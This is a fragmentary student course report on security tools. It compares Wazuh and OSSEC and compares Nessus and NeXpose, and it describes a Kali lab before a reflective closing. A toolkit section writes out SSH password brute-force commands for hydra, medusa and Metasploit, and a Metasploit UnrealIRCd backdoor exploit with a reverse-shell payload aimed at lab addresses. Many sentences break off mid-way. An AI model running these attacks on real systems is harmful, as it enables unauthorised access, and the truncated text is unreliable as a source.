Professional Documents
Culture Documents
Russell A. Findley
Masters of Science in Cyber Security Operations and Leadership, University of San Diego
Contents
Trade Studies.............................................................................................................................................3
Vulnerability Scanning............................................................................................................................5
Nessus.................................................................................................................................................5
NeXpose..............................................................................................................................................5
Security Toolkit.........................................................................................................................................7
References................................................................................................................................................12
3
Trade Studies
A trade study was completed to evaluate two different types of network security visualization
tools. Network security visualization tools are often software packages that monitor and ingest
information from the network and endpoints to view an organization's security posture. The two
products reviewed; Wazuh and OSSEC. To perform a comprehensive review of both products, it
was necessary to check the manual, identify online reviews, and perform a software installation.
The sources for the criteria were taken from (Wazuh, 2021) (OSSEC, 2020)
intrusion detection system "powerful correlation and analysis engine that integrates log analysis,
file integrity monitoring, centralized policy enforcement, rootkit detection, real-time alerting, and
active response" (Cid, 2020). OSSEC has been around since 2008 and has an active community
of users. The features evaluated were only in the community version of the product.
5
Wazuh - Open Source Host and Endpoint Security. It provides new detection and compliance
capabilities by creating a fork of the OSSEC software. Wazuh appears to be 100% due to the
Vulnerability Scanning
operating system or application. There are commercial vendors and open-source technologies
that scan for these vulnerabilities and provide recommendations for remediation. For the trade
Nessus
Nessus is a popular product which competes with other vulnerability management products from
companies such as Rapid7, Qualys, and other open-source tools like OpenVAS. The tool
features include "high-speed discovery, configuration auditing, asset profiling, sensitive data
the market to install and operate. For years, Nessus was used by smaller organizations and also
offered an open-source tool. They have since changed their licensing model and available
features to compete with the more significant players in the space. Nessus provides a limited
version of their product for smaller environments and students free by restricting the IP addresses
NeXpose
NeXpose is a vulnerability scanner created and supported by Rapid7. They have two types of
scanner that has slightly fewer features than other competitive products. Rapid7 has other
products like Metasploit, which takes vulnerabilities from tools such as NeXpose and attempts to
exploit them. NeXpose can quickly scan a network for exposures and provide real-time risk and
options for remediation with a comprehensive set of risk analysis tools and reporting capabilities.
NeXpose has a community edition, which is free to users but limited to scan 16 IP addresses.
Kali Linux 192.168.76.35/24 Kali Linux servers is an open-source penetration testing platform.
2021.2 Kali is used to exploiting other servers and services within the
network.
Ubuntu 192.168.76.36/24 The Ubuntu Linux server is used as a host on the network for
Windows Server 192.168.76.38/24 The Windows server is used as a host on the network for running
Edition
Security Toolkit
Tool Role
Wazuh Network security visualization tool that baselines and monitors events
8
in an environment.
o Hydra
hydra -L user.txt -P password.txt 192.168.0.8 ssh
o Medusa
medusa -h 192.168.0.8 -U user.txt -P password.txt -M ssh
o Metasploit
use auxiliary/scanner/ssh/ssh_login
set RHOST 192.168.0.8
set user_file user.txt
set pass_file password.txt
run
(Chandel, 2020)
Launch an exploit payload against a vulnerable web service
o Metasploit
Use exploit/unix/unreal_ircd_3281_backdoor
Set RHOST 10.1.2.5
Show options
Show payloads
Set payload payload/cmd/unix/reverse_perl
Set LHOST 10.1.2.4
exploit
Wireshark is a free tool, which allows computer and network operators to inspect network traffic.
The tool is most often used to troubleshoot network issues because you can view the traffic in
essential due to the output of information provided by the tool. Wireshark can identify
both TCP and UDP traffic. In addition to other traffic such as broadcast, encrypted,
I have been waiting for this class for quite some time to learn more about penetration testing and
whitehat hacking. I have previous experience with Windows, Linux, and Solaris operating
systems, so I figured I would have an advantage in installing software and configuring the tools
in Kali. I learned that I was partially correct. When configuring the operating system, I was at
ease with the command line, but installing the tools and configuration was much more difficult
than I initially expected. Each of the tools I installed required more libraries and .conf file
configurations to make them work. I was pleased that I could make everything work in the end,
but I took a significant amount of time trying to make everything function. Reading the manuals,
researching forums, and learning through trial and error is never an easy process, but in the end, I
We could have gone a little deeper into a few topics, such as Wireshark. I know Wireshark is the
defacto tool used by most organizations, and learning how to interpret traffic captures will be
something I delve into more at a later date. Some of the software like Kismet had been
revamped from the documentation provided in the lesson. I would have preferred to have spent
11
more time learning about the product, but instead, a significant amount of time was spent
installing a USB adapter. My recommendation for future classes is to provide a list of USB
This class fills me with the hope of learning more about security operations tools and becoming a
more decisive leader. The more I understand how a hacker will execute attacks, the better I can
build a cybersecurity operation department. I look forward to digging a little deeper into more of
References
https://ciscoquestionsandanswers.blogspot.com/2014/12/osi-model-explained-
summarydefinitions.html.
https://www.hackingarticles.in/password-crackingssh/.
Jevtic, G. (2021, May 14). How to use nmap to scan for open Ports {updated 2021}. Knowledge
https://essaysprofessors.com/samples/comparison/nessus-vs-nexpose.html.
university.com/nmap/determine-operating-system/.
https://documentation.wazuh.com/current/user-manual/index.html.